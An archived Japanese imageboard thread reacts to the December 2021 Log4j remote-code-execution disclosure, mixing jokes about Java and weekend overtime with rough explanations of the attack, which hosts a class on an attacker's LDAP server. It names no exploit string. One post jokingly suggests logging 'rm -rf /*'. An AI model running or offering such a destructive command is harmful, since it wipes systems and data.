キタ━━━━━... のスレッド詳細
削除依頼やバグ報告は メールフォーム にお願いします。個人情報、名誉毀損、侵害等については積極的に削除しますので、 メールフォーム より該当URLをご連絡いただけると助かります。
21/12/10(金)18:44:16 No.874953204
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
1 21/12/10(金)18:44:55 No.874953437
log4jが熱い!
2 21/12/10(金)18:45:37 No.874953674
年末のしかも金曜日に何やってんだテメェ…
3 21/12/10(金)18:45:57 No.874953799
やっぱりゴミだったか
4 <a href="mailto:Apache">21/12/10(金)18:46:09</a> [Apache] No.874953863
最低だよ…Java…
5 21/12/10(金)18:46:17 No.874953906
Q.何ができるの? A.何でもできるよ
6 21/12/10(金)18:46:37 No.874954012
一旦コーヒーでも飲んで落ち着こう…
7 21/12/10(金)18:46:41 No.874954039
マイクラ1.12も更新してくだち!
8 21/12/10(金)18:46:48 No.874954076
>Q.何ができるの? >A.何でもできるよ 本当に何でもできるやつがあるか!
9 21/12/10(金)18:46:53 No.874954106
よくわかんないけどみんなヤバいらしい
10 21/12/10(金)18:46:56 No.874954127
つまりDOOM動かすことだって…?
11 21/12/10(金)18:47:15 No.874954234
アップデートすればいいだけの話じゃないの
12 21/12/10(金)18:47:20 No.874954270
Javaなら定時で上がれますか?
13 21/12/10(金)18:47:30 No.874954331
これが忘年会ですか
14 21/12/10(金)18:48:01 No.874954521
やべーな地獄か…?
15 21/12/10(金)18:48:11 No.874954577
気に入らない部署の業績も無かったことにできるの?
16 21/12/10(金)18:48:13 No.874954587
30億のデバイスが牙を剥く
17 21/12/10(金)18:48:22 No.874954649
任意コード実行とかポケモンのTASくらいでしか普段見ないのにjavaで出来ちゃダメだよ!
18 21/12/10(金)18:48:25 No.874954660
人のパソコンでDOOMを購入してそのままプレイできる
19 21/12/10(金)18:48:32 No.874954706
>つまりDOOM動かすことだって…? その気になればクラウドゲームにすることだって可能
20 21/12/10(金)18:48:32 No.874954711
log4netは無事だったから良かった JNDIなんてガバガバな仕組みあるなんてだからJavaはダメなんだよ
21 21/12/10(金)18:48:35 No.874954721
ハブアナイスホリデイ!
22 21/12/10(金)18:48:46 No.874954777
>気に入らない部署の業績も無かったことにできるの? 魔法の杖さえあればなんでもできる
23 21/12/10(金)18:48:52 No.874954816
60億の調理済みステーキ
24 21/12/10(金)18:49:13 No.874954941
えっちなこと起きる可能性ある?
25 21/12/10(金)18:49:14 No.874954945
log4j使ってないサービスもそれなりにあるんじゃないしらんけど
26 21/12/10(金)18:49:24 No.874954998
>log4netは無事だったから良かった >JNDIなんてガバガバな仕組みあるなんてだからJavaはダメなんだよ 無いと色んなものが死んじゃう!
27 21/12/10(金)18:49:41 No.874955104
これなんのための処理が悪さしてるの?
28 21/12/10(金)18:49:58 No.874955200
昔はStrutsでこういう脆弱性よく聞いた気がするけどなんか久々だな
29 21/12/10(金)18:50:06 No.874955241
死んだわアイツってなる人間が山ほどいそうだけど逆にその人ら死ぬほど頑張ればどうにかなる問題なんです…?
30 21/12/10(金)18:50:09 No.874955264
どうしてリモートクラスをロードする機能を?
31 21/12/10(金)18:50:11 No.874955272
ヤバいけどうちで担保する範囲じゃないし週明けに周知すればいいか…
32 21/12/10(金)18:50:17 No.874955298
>えっちなこと起きる可能性ある? えっちはえっちでもHELLの方だがな
33 21/12/10(金)18:50:28 No.874955366
サーバーはまともなサイトならプロキシでホワイトリスト使ってるから大丈夫だろう… ローカル環境の方が怖いスマホjavaアプリとか大丈夫か
34 21/12/10(金)18:50:47 No.874955470
>これなんのための処理が悪さしてるの? ログ用のライブラリに穴があっただけだよ 問題はログ出すときは大体みんなそれつかってるって事だけだよ
35 21/12/10(金)18:51:08 No.874955583
ここみたいな匿名のところとか古いとこの方が案外無事なのかしら
36 21/12/10(金)18:51:11 No.874955599
情報業界から離れて久しいんだけどJavaの便利コマンドlog4jってのがクラッキングツールだったみたいな認識で合ってるの……?
37 21/12/10(金)18:51:23 No.874955650
>死んだわアイツってなる人間が山ほどいそうだけど逆にその人ら死ぬほど頑張ればどうにかなる問題なんです…? 別に対応自体はライブラリアップデートだからかんたんなんだけど 言語とライブラリがユーザー多いから単純に影響範囲がでかい
38 21/12/10(金)18:51:59 No.874955864
>log4j使ってないサービスもそれなりにあるんじゃないしらんけど そうだけど例えるならスマホのiOSとandroidのうち泥にログインし放題の鍵が見つかったようなもの
39 21/12/10(金)18:52:01 No.874955881
どこにでもある30憶のデバイスで任意コード実行!
40 21/12/10(金)18:52:08 No.874955914
使ってるライブラリのJAR内に含有されてる場合どうすんの?
41 21/12/10(金)18:52:17 No.874955970
マイクラはチャットで攻撃できるから愉快なことになってるみたいだな
42 21/12/10(金)18:52:18 No.874955978
死んだわ俺ら ってなるのは間違いないけど今日はもういいや…
43 21/12/10(金)18:52:35 No.874956083
>ローカル環境の方が怖いスマホjavaアプリとか大丈夫か Javaで作ってるのは主に泥だからiOSなら安心!というわけだね?
44 21/12/10(金)18:52:35 No.874956088
ライブラリに入ってるしこれ使うかってなるじゃん
45 21/12/10(金)18:52:41 No.874956119
>どうしてリモートクラスをロードする機能を? アプレットみたいなもの?違う?
46 21/12/10(金)18:52:53 No.874956194
見なかった事にしよう!って酒飲んで寝るレベル?
47 21/12/10(金)18:52:54 No.874956198
そんな最近実装された訳でもないんでしょこれ 誰も気付かないもんなの
48 21/12/10(金)18:52:54 No.874956200
範囲がわからんからVRCとかオンラインゲームが出来ねぇ!
49 21/12/10(金)18:52:59 No.874956217
どうしてログ用ライブラリにこんな機能を付けたんですか?
50 21/12/10(金)18:53:02 No.874956234
>>log4j使ってないサービスもそれなりにあるんじゃないしらんけど >そうだけど例えるならスマホのiOSとandroidのうち泥にログインし放題の鍵が見つかったようなもの 泥アプリってそんなにlog4j使ってる?
51 21/12/10(金)18:53:24 No.874956353
まぁうちのシステムには関係ない話だったからよかった…
52 21/12/10(金)18:53:24 No.874956354
俺陰毛論者だからこういうリモートで好き勝手出来る脆弱性があるものが広く採用されてるのはなんとかかんとかがの要請で用意されたバックドアだと思ってる
53 21/12/10(金)18:53:27 No.874956375
>>log4j使ってないサービスもそれなりにあるんじゃないしらんけど >そうだけど例えるならスマホのiOSとandroidのうち泥にログインし放題の鍵が見つかったようなもの Androidはlog4jじゃなくてAndroidSDKの機能使うからセーフ
54 21/12/10(金)18:53:27 No.874956378
>使ってるライブラリのJAR内に含有されてる場合どうすんの? 流石にlog4Jを内包してることはないからlog4jだけ差し替えればいいんだけどまあ検証で死ぬ
55 21/12/10(金)18:53:28 No.874956380
>どうしてログ用ライブラリにこんな機能を付けたんですか? ほら、便利でしょう?
56 21/12/10(金)18:53:34 No.874956413
マイクラのチャットで攻撃されたときはクライアント側でも実行されるの?
57 21/12/10(金)18:53:52 No.874956510
>誰も気付かないもんなの 見つけても見なかった事にする
58 21/12/10(金)18:53:57 No.874956541
自分たちのシステムには入れてないのに会社が押し付けてきたソフトに入ってて貰い事故だわ
59 21/12/10(金)18:54:02 No.874956569
こんなこともあろうかと実装しておいた機能がそのまま脆弱性になったパターンだな 誰でも真田さんになれるわけではないのだ…
60 21/12/10(金)18:54:05 No.874956588
なあに色んな人が最後のカギを手に入れただけさ
61 21/12/10(金)18:54:37 No.874956754
log4netは大丈夫!?
62 21/12/10(金)18:54:43 No.874956777
スイパラのやつもこれ関連?
63 21/12/10(金)18:54:49 No.874956818
使ってはいるけどたぶん大丈夫だろう…
64 21/12/10(金)18:55:00 No.874956891
>Androidはlog4jじゃなくてAndroidSDKの機能使うからセーフ とか言ってたらSDKに激アツexploitが見つかるパターンは本気で勘弁してほしい
65 21/12/10(金)18:55:21 No.874957010
>武器の名前がこれだと殺された時に起動するって書いてあるんだけどキルログなんかでもダメなのか
66 21/12/10(金)18:55:24 No.874957040
これじゃあgavaじゃないですか
67 21/12/10(金)18:55:29 No.874957065
入ってるlog4jのバージョンが低すぎることにより事なきを得たぜ!!
68 21/12/10(金)18:55:35 No.874957101
これから言語変えるなら何になるんだろう
69 21/12/10(金)18:55:35 No.874957105
そういやJAVAのアプデ来てたしやっておくかって見てみたら八カ月使ってないから消そうねって表示された そんなに
70 21/12/10(金)18:55:42 No.874957145
うちはKotlinだから…
71 21/12/10(金)18:55:52 No.874957199
何がまずいってPoCコード見ればお分かりの通り簡単に悪用できるのがまずい ログ吐いているであろうリクエストを想定してちょっと特別な文字列仕込むだけでいいから
72 21/12/10(金)18:56:13 No.874957336
外部に公開してないんでセーフ!
73 21/12/10(金)18:56:14 No.874957344
ちゃんと即応でアプデするとこのサービスはまあとりあえず大丈夫だとはおもうんだが これ本当に任意コードで通るから放置するとこヤバ過ぎないか
74 21/12/10(金)18:56:14 No.874957349
>入ってるlog4jのバージョンが低すぎることにより事なきを得たぜ!! 1.x系も同じ脆弱性あるって聞いたけどそれより古いなら色々となんとかしろ!
75 21/12/10(金)18:56:19 No.874957369
>マイクラはチャットで攻撃できるから愉快なことになってるみたいだな 何でもアリの無法鯖はちゃんと真っ先に閉じたらしいな
76 21/12/10(金)18:56:36 No.874957460
これ既に大きなところが漏らしたけどこれがきっかけで 攻撃されたんですけど!被害者ですたすけてくだち! と大見栄切るための名目作りだと思う
77 21/12/10(金)18:56:39 No.874957477
社内システムだからセーフ!
78 21/12/10(金)18:56:51 No.874957557
>例えばMinecraftでは、チャットに悪意のある文字列を書き込んだりすることでログに記録させるだけで任意のリモートコードを実行できてしまうことが報告されている ええやばくない?
79 21/12/10(金)18:56:55 No.874957586
あ弊社log4j使ってるわおわた
80 21/12/10(金)18:57:20 No.874957740
マジの好き放題できるやつっぽくて笑う
81 21/12/10(金)18:57:24 No.874957769
>ええやばくない? ゃばぃょ
82 21/12/10(金)18:57:33 No.874957827
よかった…うちは使ってなかった…
83 21/12/10(金)18:57:34 No.874957836
>>気に入らない部署の業績も無かったことにできるの? >魔法の杖さえあればなんでもできる こんな事もあろうかと自社DBの業績を書き換えるプログラムを組んでおいたんだよ! って状況じゃないと……
84 21/12/10(金)18:57:40 No.874957867
これ実質管理権限全部貰えるってことじゃ…
85 21/12/10(金)18:57:41 No.874957873
>これじゃあgavaじゃないですか guavaってjavaのライブラリはあるな
86 21/12/10(金)18:57:42 No.874957875
何対策すればいいかもうわかんないから 取り敢えずPCのJava消した
87 21/12/10(金)18:58:04 No.874958005
マイクラってチャットまでログに出してるのか
88 21/12/10(金)18:58:07 No.874958027
良しみんなJava捨てようぜ!
89 21/12/10(金)18:58:10 No.874958043
一般人のwin10がやったほうがいい事ってある?
90 21/12/10(金)18:58:18 No.874958098
>任意コード実行とかポケモンのTASくらいでしか普段見ないのにjavaで出来ちゃダメだよ! 馬鹿にしないでくれる!?FF6だってできるわよ!
91 21/12/10(金)18:58:28 No.874958156
よかった…うちは来年からlog4jを別のログライブラリに置き換える予定だから
92 21/12/10(金)18:58:29 No.874958162
パソコン蛾物故割れた
93 21/12/10(金)18:58:33 No.874958193
>ゲームプラットフォームのSteamやAppleの「iCloud」もこの脆弱性を持つことが分かっており スティーム死亡?
94 21/12/10(金)18:58:39 No.874958223
>これ実質管理権限全部貰えるってことじゃ… そうだが?
95 21/12/10(金)18:58:51 No.874958288
>よかった…うちは来年からlog4jを別のログライブラリに置き換える予定だから 前倒しになるフラグでは?
96 21/12/10(金)18:58:56 No.874958314
>何対策すればいいかもうわかんないから >取り敢えずPCのJava消した 別にJavaが悪いわけではないがランタイムさえ入ってなければとりあえず被害はないはずだからな…
97 21/12/10(金)18:58:57 No.874958320
>よかった…うちは来年からlog4jを別のログライブラリに置き換える予定だから よくなくない?
98 21/12/10(金)18:59:02 No.874958341
>何対策すればいいかもうわかんないから >取り敢えずPCのJava消した なんで…?
99 21/12/10(金)18:59:04 No.874958356
>一般人のwin10がやったほうがいい事ってある? ゲイツの家に突撃する
100 21/12/10(金)18:59:13 No.874958400
ログ取るだけでダメってすごい夢がある
101 21/12/10(金)18:59:15 No.874958412
>よかった…うちは来年からlog4jを別のログライブラリに置き換える予定だから 今致命傷受けてない…?
102 21/12/10(金)18:59:21 No.874958445
Steamに登録してあるクレカの情報も抜き取り放題?
103 21/12/10(金)18:59:24 No.874958458
一番怖そうなのはspring bootとかそれをラッピングした様なフレームワーク使っているところだな クソ現場で結構多用されているし
104 21/12/10(金)18:59:26 No.874958472
> 脆弱性の報告を受け、Twitter上ではITエンジニアたちが続々反応。「やばすぎる」「思っていたよりずっとひどいバグだった」「なぜこんな(外部からプログラムを取得する)機能が実装されていたのか」などの声が上がっている 本当になんで?
105 21/12/10(金)18:59:31 No.874958494
>よかった…うちは来年からlog4jを別のログライブラリに置き換える予定だから 今日やろうねえ
106 21/12/10(金)18:59:32 No.874958499
>よかった…うちは使ってなかった… やはりうちはか…
107 21/12/10(金)18:59:38 No.874958533
https://www.itmedia.co.jp/news/articles/2112/10/news157.html >例えばMinecraftでは、チャットに悪意のある文字列を書き込んだりすることでログに記録させるだけで任意のリモートコードを実行できてしまうことが報告されている。
108 21/12/10(金)18:59:46 No.874958574
>そんな最近実装された訳でもないんでしょこれ >誰も気付かないもんなの 8年くらい穴空いてたらしいな
109 21/12/10(金)18:59:52 No.874958606
>一番怖そうなのはspring bootとかそれをラッピングした様なフレームワーク使っているところだな >クソ現場で結構多用されているし ウチの事かーっ!
110 21/12/10(金)18:59:57 No.874958634
>一般人のwin10がやったほうがいい事ってある? 無い
111 21/12/10(金)18:59:58 No.874958641
金曜の退社前にって地獄か
112 21/12/10(金)19:00:03 No.874958680
俺みたいなクルクルパーは そのlogなんちゃらもわかってないのにでとにかくJAVAが悪いインターネット!って思っちゃって 消した方がいいの?と短絡的になってしまうんだ
113 21/12/10(金)19:00:17 No.874958740
SIerかわうそ…
114 21/12/10(金)19:00:24 No.874958785
>よかった…うちは来年からlog4jを別のログライブラリに置き換える予定だから 今年中に置き換える予定になりそうですかね…
115 21/12/10(金)19:00:24 No.874958790
>これ実質管理権限全部貰えるってことじゃ… RCEであってPEじゃないから無理でしょ
116 21/12/10(金)19:00:31 No.874958834
>8年くらい穴空いてたらしいな 今までjava使ったシステムは情報取り放題だったわけか…スーパーハカ…
117 21/12/10(金)19:00:36 No.874958866
>一番怖そうなのはspring bootとかそれをラッピングした様なフレームワーク使っているところだな ウチじゃん! >クソ現場で結構多用されているし ウチじゃん!
118 21/12/10(金)19:00:38 No.874958883
エリートうちはは写輪眼でソースをコピーする
119 21/12/10(金)19:00:43 No.874958909
もう日報書いて出したから 無関係ゾーン
120 21/12/10(金)19:00:43 No.874958910
>Steamに登録してあるクレカの情報も抜き取り放題? まともなとこはクレカみたいな機密情報をそのまま保存しないからそこまでは行かない気はするけどわからんね
121 21/12/10(金)19:00:53 No.874958961
私は何も見ていないので定時で失礼させてもらう
122 21/12/10(金)19:00:59 No.874958989
よくわからんけどマイクラが全国の鍵穴にされちゃったってこと?
123 21/12/10(金)19:01:00 No.874958994
>金曜の退社前にって地獄か 月曜まで対応に集中できるってことだな…
124 21/12/10(金)19:01:00 No.874958996
過去の選択でLogback選んだ俺えらい
125 21/12/10(金)19:01:14 No.874959063
Javaのクラスファイル丸ごとインジェクションできる…ってコト!?
126 21/12/10(金)19:01:17 No.874959074
ずっと悪用してたクラッカーは結構居そうだな…
127 21/12/10(金)19:01:18 No.874959080
logcatにゃんにゃんなら大丈夫にゃん?
128 21/12/10(金)19:01:24 No.874959115
Javaなんて捨てようぜ!
129 21/12/10(金)19:01:27 No.874959136
log4jってもう更新されてないの?
130 21/12/10(金)19:01:29 No.874959157
これ気づいてて黙ってた人どれくらいいるんだろう
131 21/12/10(金)19:01:33 No.874959175
よく分かんないんだけどログ取る機能がどう悪さに繋がるの?
132 21/12/10(金)19:01:37 No.874959199
>任意のリモートコードを実行可能 本当になんでもできてだめだった 仕事でjava開発してなくてよかった…
133 21/12/10(金)19:01:40 No.874959212
>まともなとこはクレカみたいな機密情報をそのまま保存しないからそこまでは行かない気はするけどわからんね そっか…登録してあるところがまともであることを祈るよ
134 21/12/10(金)19:01:52 No.874959276
なんでこんな大々的に報道するのか
135 21/12/10(金)19:01:54 No.874959283
>RCEであってPEじゃないから無理でしょ 技術者じゃないんだけど…どこまで出来ると予想されるんだい…?これだと…
136 21/12/10(金)19:01:55 No.874959296
最低だなJava…
137 21/12/10(金)19:02:24 No.874959473
>なんでこんな大々的に報道するのか 早くアップデートしないとやばいからだろ!
138 21/12/10(金)19:02:30 No.874959510
これConfluenceも影響うける…?
139 21/12/10(金)19:02:30 No.874959513
半月前には存在が報告されてたけど放置されてたらしいな
140 21/12/10(金)19:02:43 No.874959603
なんだい今日は… さっきから武器にヘンな名前つけた連中を見かけるが…
141 21/12/10(金)19:02:48 No.874959628
>なんでこんな大々的に報道するのか 悪意あるハッカーのレス
142 21/12/10(金)19:02:50 No.874959638
Javaに与えた権限次第だけどまぁ普通になんでもできる
143 21/12/10(金)19:02:52 No.874959655
>なんでこんな大々的に報道するのか おしごとふえるよ!
144 21/12/10(金)19:02:57 No.874959682
勝手にログ出力するだけのライブラリだと思ってたけどどういう原理でそうなるんだろう
145 21/12/10(金)19:03:14 No.874959769
一足早いクリスマスプレゼント…というわけだね?
146 21/12/10(金)19:03:16 No.874959785
月曜の朝発表で良かったのでは
147 21/12/10(金)19:03:22 No.874959815
>よく分かんないんだけどログ取る機能がどう悪さに繋がるの? ログの中にJavaへの命令文が含まれてるとそれをそのまま実行しちゃう マイクラの例だとチャット会話で入力した内容がそのまま全部ログになるらしい
148 21/12/10(金)19:03:24 No.874959831
こういう時インフラ屋さんでよかったって心底思う
149 21/12/10(金)19:03:26 No.874959847
説明!
150 21/12/10(金)19:03:40 No.874959937
>月曜の朝発表で良かったのでは もう界隈で広まった後だから報道してんだと思うよ…
151 21/12/10(金)19:03:41 No.874959949
>よく分かんないんだけどログ取る機能がどう悪さに繋がるの? ユーザーの入力文字列も保存するからそこに悪意のある文字列を渡す 具体的には外部へのURLへのアクセスを実行するコードを入れ込むと悪意のあるサイトへ行っちゃってそこで攻撃側がやりたい処理を書いておくとそのまま実行しちゃう
152 21/12/10(金)19:03:41 No.874959950
好きなマインクラフトの鯖を潰せるってコト…!?
153 21/12/10(金)19:03:47 No.874959975
>>RCEであってPEじゃないから無理でしょ >技術者じゃないんだけど…どこまで出来ると予想されるんだい…?これだと… Javaが動いてる権限でしか動かせないから心配しなくていいよ rootで動かしてたり昇格できるようになってたら詰む パーシステンスだけでもヤバい
154 21/12/10(金)19:03:50 No.874959995
えっちょっと待ってlog4だめだと今の現行のアプリ全部テストなんですけど…
155 21/12/10(金)19:03:52 No.874960007
創作のハッカー描写もあながち間違ってなかったんだな
156 21/12/10(金)19:03:53 No.874960013
>説明! リモートで任意のコードを実行!
157 21/12/10(金)19:03:55 No.874960029
サーバ運用してなかったらまあ大丈夫 なので一般人的に1番身近なのがマイクラになるのかな
158 21/12/10(金)19:03:55 No.874960030
>ログの中にJavaへの命令文が含まれてるとそれをそのまま実行しちゃう >マイクラの例だとチャット会話で入力した内容がそのまま全部ログになるらしい ええ…………??
159 21/12/10(金)19:03:56 No.874960032
SteamはともかくPayPalがイマイチ信用できん
160 21/12/10(金)19:03:58 No.874960038
マイクラ経由で一般に広まりまくるのマジで勘弁してくれ…緊急対応とか本当にやりたくねえんだよおおおおお!!!!
161 21/12/10(金)19:04:06 No.874960102
まあサーバーで動いてるシステムはまともに設計してれば外部接続自由なんてことはなくネットワークレベルで遮断するから攻撃されてもリモートアクセス不能で攻撃コードが実行できることはないと思うよ
162 21/12/10(金)19:04:15 No.874960142
LDAPサーバ立てた
163 21/12/10(金)19:04:18 No.874960157
ログのテンプレにコマンド埋め込むとログ出力時にデータに置き換わるみたいな機能があってその機能で悪さができた
164 21/12/10(金)19:04:21 No.874960172
こんなのSQLインジェクションと同じで初歩的な攻撃では
165 21/12/10(金)19:04:26 No.874960203
log4netも少し前に問題無かったけ?
166 21/12/10(金)19:04:30 No.874960234
>>説明! >リモートで任意のコードを実行! は?
167 21/12/10(金)19:04:38 No.874960280
任意って?
168 21/12/10(金)19:04:43 No.874960310
>ログのテンプレにコマンド埋め込むとログ出力時にデータに置き換わるみたいな機能があって 何に使うんだよ!
169 21/12/10(金)19:04:43 No.874960314
「」くん今日中に修正頼むよ
170 21/12/10(金)19:04:43 No.874960317
>マイクラ経由で一般に広まりまくるのマジで勘弁してくれ…緊急対応とか本当にやりたくねえんだよおおおおお!!!! マイクラ鯖は本当に数多いから真っ先に周知しないとネットがやばい!
171 21/12/10(金)19:04:53 No.874960378
>こういう時インフラ屋さんでよかったって心底思う うーn…こんなのほとんどないしそっちの方が大変そうだが…
172 21/12/10(金)19:04:55 No.874960395
>好きなマインクラフトの鯖を潰せるってコト…!? データは自由自在に書き換えられるし 全削除もできちゃうね
173 21/12/10(金)19:04:56 No.874960403
やっぱりフレームワークは危ないわ俺は標準ライブラリだけで実装します
174 21/12/10(金)19:05:03 No.874960441
外からもらった値をevalするな
175 21/12/10(金)19:05:03 No.874960445
これダークウェブの人らはみんな知ってたんだろうか…
176 21/12/10(金)19:05:07 No.874960463
そんな…SQL injectionより酷いじゃないですか
177 21/12/10(金)19:05:07 No.874960464
>こんなのSQLインジェクションと同じで初歩的な攻撃では はい
178 21/12/10(金)19:05:08 No.874960474
ネタが割れちゃってる以上ほっといたらゼロデイ攻撃が広がるだけだもんな…
179 21/12/10(金)19:05:08 No.874960475
ゼロディ脆弱性って2000年問題みたいな日付関連の何かだと思ってた
180 21/12/10(金)19:05:18 No.874960556
これSEやPGが頑張ってもどうにもならないからなぁ…SIerやシス管は超頑張れ
181 21/12/10(金)19:05:19 No.874960566
しゃあ!ログにrm -rf /*
182 21/12/10(金)19:05:20 No.874960579
報告してきてたのがAlibabaのチームってことなので余計にヤバイ感がある
183 21/12/10(金)19:05:21 No.874960584
なんでログ取るライブラリにコマンド実行する機能がある?
184 21/12/10(金)19:05:25 No.874960613
LDAPって認証関係のやつじゃなかったっけ? デフォルトで有効になってて外を見に行けるようになってるの?
185 21/12/10(金)19:05:25 No.874960614
>月曜の朝発表で良かったのでは こういうのは世間に発表する前に然るべき関係者には事前に報告してる
186 21/12/10(金)19:05:31 No.874960653
マイクラでもできるってことはキッズも攻撃法を知ってしまうってことか
187 21/12/10(金)19:05:35 No.874960683
>何に使うんだよ! 本当に何に使うつもりで実装したんですかね…
188 21/12/10(金)19:05:36 No.874960686
こんなんロガーの機能としては過剰なのでトロイのバックドアやろと言われても仕方ないレベル
189 21/12/10(金)19:05:46 No.874960734
>>ログのテンプレにコマンド埋め込むとログ出力時にデータに置き換わるみたいな機能があって >何に使うんだよ! 日付取得とか
190 21/12/10(金)19:05:50 No.874960765
>これSEやPGが頑張ってもどうにもならないからなぁ…SIerやシス管は超頑張れ パッチ当てたらプログラムが不具合を起こしました!
191 21/12/10(金)19:05:55 No.874960798
実際この便利機能は正規運用だとなにすんの
192 21/12/10(金)19:05:56 No.874960804
マイクラは本来の機能としてチャット部分にそのままチートコード入力して実行させる仕組みになってるから…
193 21/12/10(金)19:06:00 No.874960825
>マイクラでもできるってことはキッズも攻撃法を知ってしまうってことか 今わざわざjava版買うかなぁ
194 21/12/10(金)19:06:06 No.874960856
最低だよ…flashplayer!
195 21/12/10(金)19:06:12 No.874960891
もしもしマリオ バグがあるらしいので対応をお願いします 今週中で大丈夫です
196 21/12/10(金)19:06:17 No.874960922
>log4netは大丈夫!? そっちは今の所セーフらしいけど怖い
197 21/12/10(金)19:06:30 No.874960989
java開発にクラッカーが紛れ込んでて仕込んだバックドアとしか思えないんですけお!!!
198 21/12/10(金)19:06:35 No.874961015
マイクラは冗談抜きに対応しないとキッズに気軽に鯖破壊されるぞ
199 21/12/10(金)19:06:37 No.874961026
最低だなオラクル
200 21/12/10(金)19:06:42 No.874961061
>説明! ログ出力のための超メジャーなjavaのライブラリでログの中に命令が書かれてると何でも実行してしまう不具合が見つかる ユーザの操作によって任意のログを出力できるシステムがやばい
201 21/12/10(金)19:06:48 No.874961100
>報告してきてたのがAlibabaのチームってことなので余計にヤバイ感がある もうめぼしいところ漁りきったんだろうな
202 21/12/10(金)19:06:50 No.874961107
ログ残すだけならライブラリなんて要らないんじゃないの「」クン
203 21/12/10(金)19:06:57 No.874961140
>ログのテンプレにコマンド埋め込むとログ出力時にデータに置き換わるみたいな機能があってその機能で悪さができた その機能使ったわ こんなこと出来たんだね…
204 21/12/10(金)19:07:02 No.874961165
ログでオブジェクト吐き出せたら……スタイリッシュ……だろ?
205 21/12/10(金)19:07:03 No.874961176
>マイクラでもできるってことはキッズも攻撃法を知ってしまうってことか そうだけど攻撃用サーバー建ててクラスファイル置く知識がないとだめではある 「チャットにこう書けばこんな攻撃が出来るよ」って既に出来上がりのお品があればうn
206 21/12/10(金)19:07:06 No.874961188
実装が雑なサーバーだと変な文字列リクエストするだけで答えてくれるかもしれない
207 21/12/10(金)19:07:13 No.874961220
なんか…えらい事になってるな
208 21/12/10(金)19:07:18 No.874961239
カード番号とか大丈夫?通販サイトやばい?
209 21/12/10(金)19:07:19 No.874961248
Java使ってるサービス洗い出して影響範囲調査と対応方針策定月曜までによろしく
210 21/12/10(金)19:07:25 No.874961285
>そっちは今の所セーフらしいけど怖い まあ.NETには文字列だけでリモートのライブラリリンクして動かすなんてガバガバ機能ないはずだから大丈夫だろ…
211 21/12/10(金)19:07:26 No.874961293
javaに実行できるプログラムってどのくらいの範囲なんだ java以外と連携してとかは無いよね…
212 21/12/10(金)19:07:34 No.874961339
だいたいjavaのjndiが悪い
213 21/12/10(金)19:07:43 No.874961382
>javaに実行できるプログラムってどのくらいの範囲なんだ >java以外と連携してとかは無いよね… えっなんでも
214 21/12/10(金)19:07:47 No.874961399
これは鯉に埋めこまれた脆弱性の可能性もけっこうあるんじゃないのか…?
215 21/12/10(金)19:07:55 No.874961443
つってもマイクラやってるキッズなんて統合版じゃん?
216 21/12/10(金)19:08:01 No.874961485
やっぱりコワイね システム屋は
217 21/12/10(金)19:08:02 No.874961499
3年くらい前に書いたコードでこれ使ってたけど帰っちゃった!もうしらない!
218 21/12/10(金)19:08:06 No.874961517
今日もニコニコ定時退社じゃば
219 21/12/10(金)19:08:06 No.874961519
>実際この便利機能は正規運用だとなにすんの マイクラの話ならチャット欄にコード書いてゲーム内の昼夜を変えたり天候を変えたりアイテムを取得したり大概のことができる管理者用のチート機能なんだ
220 21/12/10(金)19:08:07 No.874961522
.classファイルを...出せ...!
221 21/12/10(金)19:08:07 No.874961526
全部ベンダーのせいにしていいよ
222 21/12/10(金)19:08:10 No.874961538
>これは鯉に埋めこまれた脆弱性の可能性もけっこうあるんじゃないのか…? 魚の陰謀か…
223 21/12/10(金)19:08:13 No.874961559
>これは鯉に埋めこまれた脆弱性の可能性もけっこうあるんじゃないのか…? 鮪かもしれん
224 21/12/10(金)19:08:24 No.874961623
ヨクエイデダイジョブは今日どれだけ唱えられたのだろう
225 21/12/10(金)19:08:24 No.874961626
>javaに実行できるプログラムってどのくらいの範囲なんだ ユーザー権限で任意コードが実行できるので実質なんでもできる 中まで入ったら昇格も楽勝でしょ
226 21/12/10(金)19:08:25 No.874961631
へーしゃはもう対応してて偉いってなった
227 21/12/10(金)19:08:30 No.874961667
ありがとうアリババ
228 21/12/10(金)19:08:37 No.874961702
しかし報告した中国人はよく気づいたな 暇潰しなコードを一行ずつよんでたのか?
229 21/12/10(金)19:08:42 No.874961734
>今日もニコニコ定時退社じゃば だが月曜日はどうかな?
230 21/12/10(金)19:08:45 No.874961762
>今わざわざjava版買うかなぁ 自分でサーバー立てるあるいはコミュニティのサーバーに参加して個性的な事するにはやっぱりJava版じゃないと…
231 21/12/10(金)19:08:47 No.874961778
どこもやばいみたいだけど 俺はなにもできない
232 21/12/10(金)19:08:47 No.874961780
なんならチートコードにもこの機能は必要ないよ
233 21/12/10(金)19:08:56 No.874961834
これでjavaがダメってなったら次はどの言語が主流になるの?
234 21/12/10(金)19:08:57 No.874961838
>>これは鯉に埋めこまれた脆弱性の可能性もけっこうあるんじゃないのか…? >鮪かもしれん 鯖じゃないのかよ
235 21/12/10(金)19:08:58 No.874961849
なんだなんだ鯖だの鯉だの
236 21/12/10(金)19:09:02 No.874961872
責任者を出せ責任者を!
237 21/12/10(金)19:09:06 No.874961893
月曜日までで大丈夫です!
238 21/12/10(金)19:09:13 No.874961930
>マイクラは本来の機能としてチャット部分にそのままチートコード入力して実行させる仕組みになってるから… コンソールとチャットを一緒に実装してるゲームはそこそこあるからな…と思ったがマイクラくらいか?
239 21/12/10(金)19:09:19 No.874961962
>責任者を出せ責任者を! 退職しました
240 21/12/10(金)19:09:29 No.874962014
勝手に管理者権限まで昇格させて各ログファイル観覧とか出来たってこと? クレカやパスワードがやばいの?
241 21/12/10(金)19:09:30 No.874962017
>責任者を出せ責任者を! 定時退社しましたので
242 21/12/10(金)19:09:31 No.874962027
バトルプログラマーになれる?
243 21/12/10(金)19:09:35 No.874962046
>そうだけど攻撃用サーバー建ててクラスファイル置く知識がないとだめではある サーバー立てる人とチャットにコマンド打ち込むクソガキは別人でいいからヤバい
244 21/12/10(金)19:09:44 No.874962091
>マイクラの話ならチャット欄にコード書いてゲーム内の昼夜を変えたり天候を変えたりアイテムを取得したり大概のことができる管理者用のチート機能なんだ 関係なさすぎる
245 21/12/10(金)19:09:45 No.874962103
エミュ鯖みたいなのは軒並みやばいのか
246 21/12/10(金)19:09:50 No.874962128
>これでjavaがダメってなったら次はどの言語が主流になるの? こぼる
247 21/12/10(金)19:09:52 No.874962133
外向けのサービスで未だにJavaなんて使ってるのか
248 21/12/10(金)19:09:59 No.874962181
SIER入ってないところは無毒化するテストやって報告で済むから30分もあればいい Sier入っているところは全テスト項目にログが実行サれないことを確認するエビデンス出さないと行けないから打鍵も辛いし影響範囲調べるのもやばい 今頃泣いてそう
